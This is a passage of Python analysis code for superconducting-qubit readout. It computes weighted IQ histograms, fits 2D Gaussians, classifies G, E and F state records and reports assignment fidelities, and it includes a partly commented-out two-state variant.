    bins_GF_G, h_GF_G, I_GF_G_pts, Q_GF_G_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax21, scale = hist_scale1, record_track = False)
    bins_GF_E, h_GF_E, I_GF_E_pts, Q_GF_E_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax22, scale = hist_scale2, record_track = False)
    bins_GF_F, h_GF_F, I_GF_F_pts, Q_GF_F_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax23, scale = hist_scale3, record_track = False)
    # EF weights:
    bins_EF_G, h_EF_G, I_EF_G_pts, Q_EF_G_pts = weighted_histogram(Sef_I, Sef_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax31, scale = hist_scale1, record_track = False)
    bins_EF_E, h_EF_E, I_EF_E_pts, Q_EF_E_pts = weighted_histogram(Sef_I, Sef_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax32, scale = hist_scale2, record_track = False)
    bins_EF_F, h_EF_F, I_EF_F_pts, Q_EF_F_pts = weighted_histogram(Sef_I, Sef_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax33, scale = hist_scale3, record_track = False)
    if plot and not fit:
        # Quick-look combined histograms (no Gaussian fits).
        fig3, axs = plt.subplots(3, 1, figsize = (6,12))
        viridis = cm.get_cmap('magma', 256)
        newcolors = viridis(np.linspace(0, 1, 256))
        gray = np.array([0.1, 0.1, 0.1, 0.1])
        newcolors[128-5: 128+5] = gray
        newcmp = ListedColormap(newcolors)
        ax1 = axs[0]
        ax2 = axs[1]
        ax3 = axs[2]
        ax1.set_title("Sge - inputs G and E")
        ax1.pcolormesh(bins_GE_G, bins_GE_G, h_GE_G+h_GE_E)
        ax1.set_aspect(1)
        ax2.set_title("Sgf - inputs G and F")
        ax2.pcolormesh(bins_GF_G, bins_GF_F, h_GF_G+h_GF_F)
        ax2.set_aspect(1)
        ax3.set_title("Sef - inputs E and F")
        ax3.pcolormesh(bins_EF_E, bins_EF_F, h_EF_E+h_EF_F)
        ax3.set_aspect(1)
        fig3.tight_layout()
    if fit:
        # Fit 2D Gaussians to the six relevant histograms, build per-pixel
        # discriminants, then classify every record.
        I_G = sI_c1
        Q_G = sQ_c1
        I_E = sI_c2
        Q_E = sQ_c2
        I_F = sI_c3
        Q_F = sQ_c3
        I_G_avg = np.average(I_G, axis = 0)
        I_E_avg = np.average(I_E, axis = 0)
        I_F_avg = np.average(I_F, axis = 0)
        Q_G_avg = np.average(Q_G, axis = 0)
        Q_E_avg = np.average(Q_E, axis = 0)
        Q_F_avg = np.average(Q_F, axis = 0)
        if guess:
            # Build one initial-parameter list per (weight pair, state):
            # center from the demodulated averaged traces, amplitude from
            # histogram peaks, width from hist_scale.
            guessParams = []
            for i, [wfs, avgs] in enumerate([
                    [[Sge_I, Sge_Q], [I_G_avg, Q_G_avg, I_E_avg, Q_E_avg]],
                    [[Sgf_I, Sgf_Q], [I_G_avg, Q_G_avg, I_F_avg, Q_F_avg]],
                    [[Sef_I, Sef_Q], [I_E_avg, Q_E_avg, I_F_avg, Q_F_avg]],
                    ]):
                for j in range(2):
                    A_x0Guess = np.dot(avgs[2*j+0], wfs[0])+np.dot(avgs[2*j+1], wfs[1])
                    A_y0Guess = np.dot(avgs[2*j+1], wfs[0])-np.dot(avgs[2*j+0], wfs[1])
                    A_ampGuess = np.average([np.max(h_GE_G), np.max(h_GF_G), np.max(h_EF_F)])
                    A_sxGuess = hist_scale/8
                    # A_thetaGuess = np.average(np.angle(A_x0Guess+1j*A_y0Guess))
                    A_thetaGuess = 0
                    # NOTE(review): A_thetaGuess is computed but not appended,
                    # and the guess stores [amp, y0, x0, sx] while the label
                    # line below prints five names with X0 before Y0 --
                    # confirm against fit_2D_Gaussian's expected ordering.
                    guessParams.append([A_ampGuess, A_y0Guess, A_x0Guess, A_sxGuess])
            print(["amp", "Y0", 'X0', 'Sigma_x', 'Theta'])
            print(guessParams)
            print(np.shape(guessParams))
        else:
            # No guesses: fit_2D_Gaussian self-seeds when given None.
            guessParams = [None, None, None, None, None, None]
        ########
        max_fev = 10000
        line_ind = 0
        GE_G_fit = fit_2D_Gaussian('GE_G_fit', bins_GE_G, h_GE_G,
                                   guessParams[0],
                                   # None,
                                   max_fev = max_fev,
                                   contour_line = line_ind)
        # Evaluate the fitted Gaussian on the histogram grid (bin left edges).
        GE_G_fit_h = Gaussian_2D(np.meshgrid(bins_GE_G[:-1], bins_GE_G[:-1]), *GE_G_fit.info_dict['popt'])
        print(GE_G_fit.info_dict['popt'])
        GE_G_fit_h_norm = np.copy(GE_G_fit_h/np.sum(GE_G_fit_h))
        ########
        GE_E_fit = fit_2D_Gaussian('GE_E_fit', bins_GE_E, h_GE_E,
                                   guessParams[1],
                                   # None,
                                   max_fev = max_fev,
                                   contour_line = line_ind)
        GE_E_fit_h = Gaussian_2D(np.meshgrid(bins_GE_E[:-1], bins_GE_E[:-1]), *GE_E_fit.info_dict['popt'])
        print(GE_E_fit.info_dict['popt'])
        GE_E_fit_h_norm = np.copy(GE_E_fit_h/np.sum(GE_E_fit_h))
        ########
        GF_G_fit = fit_2D_Gaussian('GF_G_fit', bins_GF_G, h_GF_G,
                                   guessParams[2],
                                   # None,
                                   max_fev = max_fev,
                                   contour_line = line_ind)
        GF_G_fit_h = Gaussian_2D(np.meshgrid(bins_GF_G[:-1], bins_GF_G[:-1]), *GF_G_fit.info_dict['popt'])
        print(GF_G_fit.info_dict['popt'])
        GF_G_fit_h_norm = np.copy(GF_G_fit_h/np.sum(GF_G_fit_h))
        GF_F_fit = fit_2D_Gaussian('GF_F_fit', bins_GF_F, h_GF_F,
                                   guessParams[3],
                                   # None,
                                   max_fev = max_fev,
                                   contour_line = line_ind)
        print(GF_F_fit.info_dict['popt'])
        GF_F_fit_h = Gaussian_2D(np.meshgrid(bins_GF_F[:-1], bins_GF_F[:-1]), *GF_F_fit.info_dict['popt'])
        GF_F_fit_h_norm = np.copy(GF_F_fit_h/np.sum(GF_F_fit_h))
        EF_E_fit = fit_2D_Gaussian('EF_E_fit', bins_EF_E, h_EF_E,
                                   guessParams[4],
                                   # None,
                                   max_fev = max_fev,
                                   contour_line = line_ind)
        print(EF_E_fit.info_dict['popt'])
        EF_E_fit_h = Gaussian_2D(np.meshgrid(bins_EF_E[:-1], bins_EF_E[:-1]), *EF_E_fit.info_dict['popt'])
        EF_E_fit_h_norm = np.copy(EF_E_fit_h/np.sum(EF_E_fit_h))
        EF_F_fit = fit_2D_Gaussian('EF_F_fit', bins_EF_F, h_EF_F,
                                   guessParams[5],
                                   # None,
                                   max_fev = max_fev,
                                   contour_line = line_ind)
        print(EF_F_fit.info_dict['popt'])
        EF_F_fit_h = Gaussian_2D(np.meshgrid(bins_EF_F[:-1], bins_EF_F[:-1]), *EF_F_fit.info_dict['popt'])
        EF_F_fit_h_norm = np.copy(EF_F_fit_h/np.sum(EF_F_fit_h))
        # Boolean per-pixel discriminants: True where the first state's
        # fitted Gaussian dominates (see project helper hist_discriminant).
        GE_is_G = hist_discriminant(GE_G_fit_h, GE_E_fit_h)
        GE_is_E = np.logical_not(GE_is_G)
        GF_is_G = hist_discriminant(GF_G_fit_h, GF_F_fit_h)
        GF_is_F = np.logical_not(GF_is_G)
        EF_is_E = hist_discriminant(EF_E_fit_h, EF_F_fit_h)
        EF_is_F = np.logical_not(EF_is_E)
        if plot:
            # Figure 3: raw combined histograms (top row) and fitted
            # discriminant maps with 1-sigma contours (bottom row).
            fig3, axs = plt.subplots(2, 3, figsize = (12,8))
            viridis = cm.get_cmap('magma', 256)
            newcolors = viridis(np.linspace(0, 1, 256))
            gray = np.array([0.1, 0.1, 0.1, 0.1])
            newcolors[128-5: 128+5] = gray
            newcmp = ListedColormap(newcolors)
            ax1 = axs[0,0]
            ax2 = axs[0,1]
            ax3 = axs[0,2]
            ax1.set_title("Sge - inputs G and E")
            ax1.pcolormesh(bins_GE_G, bins_GE_G, h_GE_G+h_GE_E)
            ax2.set_title("Sgf - inputs G and F")
            ax2.pcolormesh(bins_GF_G, bins_GF_F, h_GF_G+h_GF_F)
            ax3.set_title("Sef - inputs E and F")
            ax3.pcolormesh(bins_EF_E, bins_EF_F, h_EF_E+h_EF_F)
            #*(GE_is_G-1/2)
            scale = np.max((GE_G_fit_h+GE_E_fit_h))
            pc1 = axs[1,0].pcolormesh(bins_GE_G, bins_GE_G, (GE_G_fit_h+GE_E_fit_h)*(GE_is_G-1/2)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
            plt.colorbar(pc1, ax = axs[1,0],fraction=0.046, pad=0.04)
            GE_G_fit.plot_on_ax(axs[1,0])
            axs[1,0].add_patch(GE_G_fit.sigma_contour())
            GE_E_fit.plot_on_ax(axs[1,0])
            axs[1,0].add_patch(GE_E_fit.sigma_contour())
            # NOTE(review): the GF and EF panels below reuse bins_GE_G for
            # their meshes and pc1 for their colorbars -- likely copy/paste
            # leftovers (harmless if all bin arrays are identical); confirm.
            scale = np.max((GF_G_fit_h+GF_F_fit_h))
            pc2 = axs[1,1].pcolormesh(bins_GE_G, bins_GE_G, (GF_is_G-1/2)*(GF_G_fit_h+GF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
            plt.colorbar(pc1, ax = axs[1,1],fraction=0.046, pad=0.04)
            GF_G_fit.plot_on_ax(axs[1,1])
            axs[1,1].add_patch(GF_G_fit.sigma_contour())
            GF_F_fit.plot_on_ax(axs[1,1])
            axs[1,1].add_patch(GF_F_fit.sigma_contour())
            scale = np.max((EF_E_fit_h+EF_F_fit_h))
            pc3 = axs[1,2].pcolormesh(bins_GE_G, bins_GE_G, (EF_is_E-1/2)*(EF_E_fit_h+EF_F_fit_h)/scale*5, cmap = newcmp, vmin = -1, vmax = 1)
            plt.colorbar(pc1, ax = axs[1,2],fraction=0.046, pad=0.04)
            EF_E_fit.plot_on_ax(axs[1,2])
            axs[1,2].add_patch(EF_E_fit.sigma_contour())
            EF_F_fit.plot_on_ax(axs[1,2])
            axs[1,2].add_patch(EF_F_fit.sigma_contour())
            fig3.tight_layout(h_pad = 0.1, w_pad = 1)
            for ax in np.array(axs).flatten():
                ax.set_aspect(1)
                ax.grid()
        # Classify the records - done for each weight function.
        results = []
        GE_results = []
        GF_results = []
        EF_results = []
        # Stack all records in known order: G block, then E, then F.
        all_I = np.vstack((sI_c1_classify, sI_c2_classify, sI_c3_classify))
        all_Q = np.vstack((sQ_c1_classify, sQ_c2_classify, sQ_c3_classify))
        # print("all_I shape: ", np.shape(all_I))
        # print(np.shape(list(zip(sI_c1, sQ_c1))))
        for record in list(zip(all_I, all_Q)):
            It, Qt = record[0], record[1]
            # GE weights: demodulate, then look up the discriminant pixel.
            ge_I = np.dot(Sge_I, It)+np.dot(Sge_Q, Qt)
            ge_Q = np.dot(Sge_I, Qt)-np.dot(Sge_Q, It)
            Iloc = np.digitize(ge_I, bins_GE_G)
            Qloc = np.digitize(ge_Q, bins_GE_G)
            # NOTE(review): hard-coded clamp to index 98 -- presumably the
            # histograms are 99x99 (100 bin edges); verify against
            # weighted_histogram.
            if Iloc >= 99: Iloc = 98
            if Qloc >= 99: Qloc = 98
            # If 1 it's G.
            Sge_result = GE_is_G[Iloc, Qloc]
            # GF weights
            gf_I = np.dot(Sgf_I, It)+np.dot(Sgf_Q, Qt)
            gf_Q = np.dot(Sgf_I, Qt)-np.dot(Sgf_Q, It)
            Iloc = np.digitize(gf_I, bins_GF_G)
            Qloc = np.digitize(gf_Q, bins_GF_G)
            if Iloc >= 99: Iloc = 98
            if Qloc >= 99: Qloc = 98
            # If 1 it's G.
            Sgf_result = GF_is_G[Iloc, Qloc]
            # EF weights
            ef_I = np.dot(Sef_I, It)+np.dot(Sef_Q, Qt)
            ef_Q = np.dot(Sef_I, Qt)-np.dot(Sef_Q, It)
            Iloc = np.digitize(ef_I, bins_EF_E)
            Qloc = np.digitize(ef_Q, bins_EF_E)#edge-shifting
            if Iloc >= 99: Iloc = 98
            if Qloc >= 99: Qloc = 98
            # If 1 it's E.
            Sef_result = EF_is_E[Iloc, Qloc]
            # print(Sge_result)
            # print(Sgf_result)
            # Majority-style vote over the three pairwise classifiers;
            # inconsistent combinations fall through to the Null outcome.
            if Sge_result*Sgf_result:
                result = 1 #G
            elif not Sge_result and Sef_result:
                result = 2 #E
            elif not Sef_result and not Sgf_result:
                result = 3 #F
            else:
                result = 4 #Null
            results.append(result)
            GE_results.append(Sge_result)
            GF_results.append(Sgf_result)
            EF_results.append(Sef_result)
        results = np.array(results)
        # Rescale so G-> 1, E-> 2, F -> 3 for plotting against `results`.
        GE_results = np.logical_not(np.array(GE_results))+1
        GF_results = np.logical_not(np.array(GF_results))*2+1
        EF_results = np.logical_not(np.array(EF_results))+2
        # div1 records per prepared state, in the stacking order above.
        div1 = np.shape(sI_c1_classify)[0]
        numRecords = 3*div1
        # print(div1)
        correct_classifications = np.append(np.append(np.ones(div1), 2*np.ones(div1)), 3*np.ones(div1))
        # Count of records classified as Null (result code 4).
        numberNull = np.sum(results[results == 4]/4)
        # Overall assignment fidelity over all three prepared states.
        fidelity = np.round(np.sum(correct_classifications==results)/numRecords, 3)
        if plot:
            # Strip-chart comparison of expected vs. obtained class labels.
            fig, ax = plt.subplots(5,1, figsize = (4, 8))
            viridisBig = cm.get_cmap('viridis', 512)
            _cmap = ListedColormap(viridisBig(np.linspace(0, 1, 256)))
            scale = Norm(vmin = 1, vmax = 4)
            ax[0].set_title("Correct classifications")
            ax[0].imshow([correct_classifications, correct_classifications], interpolation = 'none', cmap = _cmap, norm = scale)
            ax[1].set_title("GE classifications")
            ax[1].imshow([GE_results,GE_results], interpolation = 'none', cmap = _cmap, norm = scale)
            ax[2].set_title("GF classifications")
            ax[2].imshow([GF_results,GF_results], interpolation = 'none', cmap = _cmap, norm = scale)
            ax[3].set_title("EF classifications")
            ax[3].imshow([EF_results,EF_results], interpolation = 'none', cmap = _cmap, norm = scale)
            ax[4].set_title("Final classifications")
            ax[4].get_yaxis().set_ticks([])
            ax[4].set_label("Record number")
            ax[4].imshow([results, results], interpolation = 'none', cmap = _cmap, norm = scale)
            ax[4].set_aspect(1000)
            for axi in ax:
                axi.get_yaxis().set_ticks([])
                axi.set_aspect(1000)
            # ax[2].imshow([right, right], interpolation = 'none')
            # ax[2].set_aspect(1000)
            fig.tight_layout(h_pad = 1, w_pad = 1)
        if debug:
            print("checking sum: ", np.max(correct_classifications[2*div1:-1]==results[2*div1:-1]))
            print("Number of Null results: ", numberNull)
            # Separation metric: distance between fitted centers in units of
            # the first fit's sigma_x.
            print("Sge Imbar/sigma: ", np.linalg.norm(GE_G_fit.center_vec()-GE_E_fit.center_vec())/GE_G_fit.info_dict['sigma_x'])
            print("Sgf Imbar/sigma: ", np.linalg.norm(GF_G_fit.center_vec()-GF_F_fit.center_vec())/GF_G_fit.info_dict['sigma_x'])
            print("Sef Imbar/sigma: ", np.linalg.norm(EF_E_fit.center_vec()-EF_F_fit.center_vec())/EF_E_fit.info_dict['sigma_x'])
        # Per-state fidelities over each third of the stacked record set.
        # NOTE(review): the F slice uses [2*div1:-1], which drops the final
        # record from the F fidelity -- confirm whether [2*div1:] was meant.
        G_fidelity = np.round(np.sum(correct_classifications[0:div1]==results[0:div1])/div1, 3)
        E_fidelity = np.round(np.sum(correct_classifications[div1:2*div1]==results[div1:2*div1])/div1, 3)
        F_fidelity = np.round(np.sum(correct_classifications[2*div1:-1]==results[2*div1:-1])/div1, 3)
        return G_fidelity, E_fidelity, F_fidelity, fidelity, numberNull
def Process_One_Acquisition_2_state(name, time_vals, sI_c1, sI_c2, sQ_c1 ,sQ_c2, hist_scale = 200, odd_only = False, even_only = False, plot = False, lpf = True, lpf_wc = 50e6, fit = False, hist_y_scale = 10, boxcar = False, bc_window = [50, 150], record_track = False, numRecordsUsed = 7860, debug = False):
sI_c1_classify = sI_c1
sI_c2_classify = sI_c2
# sI_c3_classify = sI_c3
sQ_c1_classify = sQ_c1
sQ_c2_classify = sQ_c2
# sQ_c3_classify = sQ_c3
sI_c1 = sI_c1[0:numRecordsUsed//3].copy()
sI_c2 = sI_c2[0:numRecordsUsed//3].copy()
# sI_c3 = sI_c3[0:numRecordsUsed//3].copy()
sQ_c1 = sQ_c1[0:numRecordsUsed//3].copy()
sQ_c2 = sQ_c2[0:numRecordsUsed//3].copy()
# sQ_c3 = sQ_c3[0:numRecordsUsed//3].copy()
if boxcar:
WF = np.zeros(np.size(time_vals))
WF[bc_window[0]:bc_window[1]] = 1
Sge = Sgf = Sef = WF
else:
#weight functions denoted by Sij for telling trace i from trace j
Sge_I, Sge_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c2, axis = 0)), (np.average(sQ_c1, axis = 0)-np.average(sQ_c2, axis = 0))]
# Sgf_I, Sgf_Q = [(np.average(sI_c1, axis = 0)-np.average(sI_c3, axis = 0)), (np.average(sQ_c1, axis = 0)-np.average(sQ_c3, axis = 0))]
# Sef_I, Sef_Q = [(np.average(sI_c2, axis = 0)-np.average(sI_c3, axis = 0)), (np.average(sQ_c2, axis = 0)-np.average(sQ_c3, axis = 0))]
if lpf:
Sge_I = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sge_I)
# Sgf = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sgf)
# Sef = sosfilt(butter(10, lpf_wc, fs = 1e9/20, output = 'sos'), Sef)
#nromalizing weight functions
# Sge_I /= np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)])
# Sge_Q /= np.linalg.norm([np.abs(Sge_I), np.abs(Sge_Q)])
# Sef_I /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
# Sef_Q /= np.linalg.norm([np.abs(Sef_I), np.abs(Sef_Q)])
# Sgf_I /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
# Sgf_Q /= np.linalg.norm([np.abs(Sgf_I), np.abs(Sgf_Q)])
sI_c1_avg = np.average(sI_c1, axis = 0)
sI_c2_avg = np.average(sI_c2, axis = 0)
# sI_c3_avg = np.average(sI_c3, axis = 0)
sQ_c1_avg = np.average(sQ_c1, axis = 0)
sQ_c2_avg = np.average(sQ_c2, axis = 0)
# sQ_c3_avg = np.average(sQ_c3, axis = 0)
if plot:
fig = plt.figure(1, figsize = (12,8))
fig.suptitle(name, fontsize = 20)
ax1 = fig.add_subplot(221)
ax1.set_title("I average")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax1.plot(time_vals, np.average(sI_c1, axis = 0)*1000, label = 'G_records')
ax1.plot(time_vals,np.average(sI_c2, axis = 0)*1000, label = 'E_records')
# ax1.plot(time_vals,np.average(sI_c3, axis = 0)*1000, label = 'F_records')
ax1.grid()
# ax1.set_aspect(1)
ax1.legend(loc = 'upper right')
ax2 = fig.add_subplot(222)
ax2.set_title("Q average")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax2.plot(time_vals,np.average(sQ_c1, axis = 0)*1000, label = 'G records')
ax2.plot(time_vals,np.average(sQ_c2, axis = 0)*1000, label = 'E records')
# ax2.plot(time_vals,np.average(sQ_c3, axis = 0)*1000, label = 'F records')
ax2.grid()
# ax2.set_aspect(1)
ax2.legend(loc = 'upper right')
ax3 = fig.add_subplot(223)
ax3.set_title("Trajectories")
ax3.set_ylabel("I Voltage (mV)")
ax3.set_xlabel("Q Voltage (mV)")
ax3.set_aspect(1)
ax3.plot(np.average(sI_c1, axis = 0)*1000, np.average(sQ_c1, axis = 0)*1000)
ax3.plot(np.average(sI_c2, axis = 0)*1000,np.average(sQ_c2, axis = 0)*1000)
# ax3.plot(np.average(sI_c3, axis = 0)*1000,np.average(sQ_c3, axis = 0)*1000)
ax3.grid()
ax4 = fig.add_subplot(224)
ax4.set_title("Weight Functions")
ax4.plot(Sge_I, label = 'Wge_I')
ax4.plot(Sge_Q, label = 'Wge_Q')
# ax4.plot(Sgf_I, label = 'Wgf')
# ax4.plot(Sgf_Q, label = 'Wgf')
# ax4.plot(Sef_I, label = 'Wef')
# ax4.plot(Sef_Q, label = 'Wef')
ax4.legend()
ax4.grid()
fig.tight_layout(h_pad = 1, w_pad = 1.5)
fig01 = plt.figure(10, figsize = (12,8))
fig01.suptitle(name, fontsize = 20)
ax1 = fig01.add_subplot(111)
ax1.set_title("Magnitude Difference between G and E")
ax1.set_ylabel("Voltage (mV)")
ax1.set_xlabel("Time (ns)")
ax1.plot(time_vals, np.sqrt(sI_c1_avg**2+sQ_c1_avg**2)*1000 - np.sqrt(sI_c2_avg**2+sQ_c2_avg**2)*1000, label = 'G_records-E_records')
ax1.grid()
fig2 = plt.figure(2, figsize = (12,8))
ax11 = fig2.add_subplot(331)
ax11.set_title("GE - G")
ax12 = fig2.add_subplot(332)
ax12.set_title("GE - E")
# ax13 = fig2.add_subplot(333)
# ax13.set_title("GE - F")
# ax21 = fig2.add_subplot(334)
# ax21.set_title("GF - G")
# ax22 = fig2.add_subplot(335)
# ax22.set_title("GF - E")
# ax23 = fig2.add_subplot(336)
# ax23.set_title("GF - F")
# ax31 = fig2.add_subplot(337)
# ax31.set_title("EF - G")
# ax32 = fig2.add_subplot(338)
# ax32.set_title("EF - E")
# ax33 = fig2.add_subplot(339)
# ax33.set_title("EF - F")
ax11.grid()
ax12.grid()
# ax13.grid()
# ax21.grid()
# ax22.grid()
# ax23.grid()
# ax31.grid()
# ax32.grid()
# ax33.grid()
fig2.tight_layout(h_pad = 1, w_pad = 1)
else:
fig2 = None
ax11 = ax12 = ax13 = ax21 = ax22 = ax23 = ax31 = ax32 = ax33 = None
#using GE weights:
if hist_scale == None:
hist_scale = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
hist_scale1 = np.max(np.abs([sI_c1_avg, sQ_c1_avg]))*1.2
hist_scale2 = hist_scale1
hist_scale3 = hist_scale1
else:
hist_scale1 = hist_scale
hist_scale2 = hist_scale
hist_scale3 = hist_scale
# hist_scale2 = np.max(np.abs([sI_c2_avg, sQ_c2_avg]))*1.2
# hist_scale3 = np.max(np.abs([sI_c3_avg, sQ_c3_avg]))*1.2
#GE weights
bins_GE_G, h_GE_G, I_GE_G_pts, Q_GE_G_pts = weighted_histogram(Sge_I, Sge_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax11, scale = hist_scale1, record_track = record_track)
bins_GE_E, h_GE_E, I_GE_E_pts, Q_GE_E_pts = weighted_histogram(Sge_I, Sge_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax12, scale = hist_scale2, record_track = record_track)
# bins_GE_F, h_GE_F, I_GE_F_pts, Q_GE_F_pts = weighted_histogram(Sge_I, Sge_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax13, scale = hist_scale3, record_track = record_track)
#
#GF weights:
# bins_GF_G, h_GF_G, I_GF_G_pts, Q_GF_G_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax21, scale = hist_scale1, record_track = False)
# bins_GF_E, h_GF_E, I_GF_E_pts, Q_GF_E_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax22, scale = hist_scale2, record_track = False)
# bins_GF_F, h_GF_F, I_GF_F_pts, Q_GF_F_pts = weighted_histogram(Sgf_I, Sgf_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax23, scale = hist_scale3, record_track = False)
#EF weights:
# bins_EF_G, h_EF_G, I_EF_G_pts, Q_EF_G_pts = weighted_histogram(Sef_I, Sef_Q, sI_c1, sQ_c1, plot = plot, fig = fig2, ax = ax31, scale = hist_scale1, record_track = False)
# bins_EF_E, h_EF_E, I_EF_E_pts, Q_EF_E_pts = weighted_histogram(Sef_I, Sef_Q, sI_c2, sQ_c2, plot = plot, fig = fig2, ax = ax32, scale = hist_scale2, record_track = False)
# bins_EF_F, h_EF_F, I_EF_F_pts, Q_EF_F_pts = weighted_histogram(Sef_I, Sef_Q, sI_c3, sQ_c3, plot = plot, fig = fig2, ax = ax33, scale = hist_scale3, record_track = False)
if fit:
I_G = sI_c1
Q_G = sQ_c1
I_E = sI_c2
Q_E = sQ_c2
# I_F = sI_c3
# Q_F = sQ_c3
I_G_avg = np.average(I_G, axis = 0)
I_E_avg = np.average(I_E, axis = 0)
# I_F_avg = np.average(I_F, axis = 0)
Q_G_avg = np.average(Q_G, axis = 0)
Q_E_avg = np.average(Q_E, axis = 0)
# Q_F_avg = np.average(Q_F, axis = 0)
G_x0Guess = np.max(I_G_avg)
G_x0Guess = np.dot(I_G_avg, Sge_I)+np.dot(Q_G_avg, Sge_Q)
G_y0Guess = np.max(Q_G_avg)
G_y0_Guess = np.dot(Q_G_avg, Sge_Q)-np.dot(I_G_avg, Sge_I)
G_ampGuess = np.average(np.sqrt(I_G_avg**2+Q_G_avg**2))
G_sxGuess = hist_scale/2
G_syGuess = hist_scale/2
G_thetaGuess = np.average(np.angle(I_G_avg+1j*Q_G_avg))
G_offsetGuess = 0
E_x0Guess = np.max(I_E_avg)
E_y0Guess = np.max(Q_E_avg)
E_ampGuess = np.average(np.sqrt(I_E_avg**2+Q_E_avg**2))
E_sxGuess = hist_scale/2
E_syGuess = hist_scale/2
E_thetaGuess = np.average(np.angle(I_E_avg+1j*Q_E_avg))
E_offsetGuess = 0
# F_x0Guess = np.max(I_F_avg)
# F_y0Guess = np.max(Q_F_avg)
# F_ampGuess = np.average(np.sqrt(I_F_avg**2+Q_F_avg**2))
# F_sxGuess = hist_scale/2
# F_syGuess = hist_scale/2
# F_thetaGuess = np.average(np.angle(I_F_avg+1j*Q_F_avg))
# F_offsetGuess = 0
guessParams = [[G_ampGuess, G_x0Guess, G_y0Guess, G_sxGuess, G_thetaGuess],
[E_ampGuess, E_x0Guess, E_y0Guess, E_sxGuess, E_thetaGuess],
]
if debug:
print("fitting guess parameters: ", guessParams)
########
max_fev = 10000
line_ind = 0
GE_G_fit = fit_2D_Gaussian('GE_G_fit', bins_GE_G, h_GE_G,
# guessParams[0],
None,
max_fev = max_fev,
contour_line = line_ind)
GE_G_fit_h = Gaussian_2D(np.meshgrid(bins_GE_G[:-1], bins_GE_G[:-1]), *GE_G_fit.info_dict['popt'])
GE_G_fit_h_norm = np.copy(GE_G_fit_h/np.sum(GE_G_fit_h))
########
GE_E_fit = fit_2D_Gaussian('GE_E_fit', bins_GE_E, h_GE_E,
# guessParams[1],
None,
max_fev = max_fev,
contour_line = line_ind)
GE_E_fit_h = Gaussian_2D(np.meshgrid(bins_GE_E[:-1], bins_GE_E[:-1]), *GE_E_fit.info_dict['popt'])
GE_E_fit_h_norm = np.copy(GE_E_fit_h/np.sum(GE_E_fit_h))
########
# GF_G_fit = fit_2D_Gaussian('GF_G_fit', bins_GF_G, h_GF_G,
# # guessParams[0],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# GF_G_fit_h = Gaussian_2D(np.meshgrid(bins_GF_G[:-1], bins_GF_G[:-1]), *GF_G_fit.info_dict['popt'])
# GF_G_fit_h_norm = np.copy(GF_G_fit_h/np.sum(GF_G_fit_h))
# GF_F_fit = fit_2D_Gaussian('GF_F_fit', bins_GF_F, h_GF_F,
# # guessParams[2],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# GF_F_fit_h = Gaussian_2D(np.meshgrid(bins_GF_F[:-1], bins_GF_F[:-1]), *GF_F_fit.info_dict['popt'])
# GF_F_fit_h_norm = np.copy(GF_F_fit_h/np.sum(GF_F_fit_h))
# EF_E_fit = fit_2D_Gaussian('EF_E_fit', bins_EF_E, h_EF_E,
# # guessParams[2],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# EF_E_fit_h = Gaussian_2D(np.meshgrid(bins_EF_E[:-1], bins_EF_E[:-1]), *EF_E_fit.info_dict['popt'])
# EF_E_fit_h_norm = np.copy(EF_E_fit_h/np.sum(EF_E_fit_h))
# EF_F_fit = fit_2D_Gaussian('EF_F_fit', bins_EF_F, h_EF_F,
# # guessParams[2],
# None,
# max_fev = max_fev,
# contour_line = line_ind)
# EF_F_fit_h = Gaussian_2D(np.meshgrid(bins_EF_F[:-1], bins_EF_F[:-1]), *EF_F_fit.info_dict['popt'])
# EF_F_fit_h_norm = np.copy(EF_F_fit_h/np.sum(EF_F_fit_h))
GE_is_G = hist_discriminant(GE_G_fit_h, GE_E_fit_h)
GE_is_E = np.logical_not(GE_is_G)
# GF_is_G = hist_discriminant(GF_G_fit_h, GF_F_fit_h)
# GF_is_F = np.logical_not(GF_is_G)
# EF_is_E = hist_discriminant(EF_E_fit_h, EF_F_fit_h)
# EF_is_F = np.logical_not(EF_is_E)
if plot:
fig3, axs = plt.subplots(2, 3, figsize = (12,8))
viridis = cm.get_cmap('magma', 256)
newcolors = viridis(np.linspace(0, 1, 256))
gray = np.array([0.1, 0.1, 0.1, 0.1])
newcolors[128-5: 128+5] = gray
newcmp = ListedColormap(newcolors)
ax1 = axs[0,0]
ax2 = axs[0,1]
ax3 = axs[0,2]
ax1.set_title("Sge - inputs G and E")
ax1.pcolormesh(bins_GE_G, bins_GE_G, h_GE_G+h_GE_E)
ax2.set_title("Sgf - inputs G and F")
# ax2.pcolormesh(bins_GF_G, bins_GF_F, h_GF_G+h_GF_F)
ax3.set_title("Sef - inputs E and F")
# ax3.pcolormesh(bins_EF_E, bins_EF_F, h_EF_E+h_EF_F)
#*(GE_is_G-1/2)
scale = np.max((GE_G_fit_h+GE_E_fit_h))
